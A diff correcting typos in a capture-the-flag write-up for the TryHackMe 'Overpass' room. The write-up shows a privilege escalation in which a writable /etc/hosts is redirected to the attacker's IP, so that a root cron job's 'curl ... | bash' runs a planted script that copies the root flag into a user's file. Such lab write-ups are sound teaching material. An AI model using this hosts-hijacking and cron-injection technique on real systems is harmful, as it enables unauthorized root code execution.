DeluxeOwl/CTF_Writeups/Overpass/Overpass.md

 ![](16.png)

 Nice!
-It seems that we have write permission
+It seems that we have write permissions
 Let's change the ip of `overpass.thm` to our VPN ip (you can find it using `ip a`, or from the acces page on tryhackme)

-We open `/etc/hosts` using **vim** and we write out ip address
+We open `/etc/hosts` using **vim** and we write our ip address
 ![](17.png)

 * * *

-Alright, since the cron job requests from `curl overpass.thm/downloads/src/buildscript.sh | bash` we have to make directory and write our build script with the following content:
+Alright, since the cron job requests from `curl overpass.thm/downloads/src/buildscript.sh | bash` we have to make a directory and write our build script with the following content:
 ```bash
 cat /root/root.txt > /home/james/stuff.txt
 ```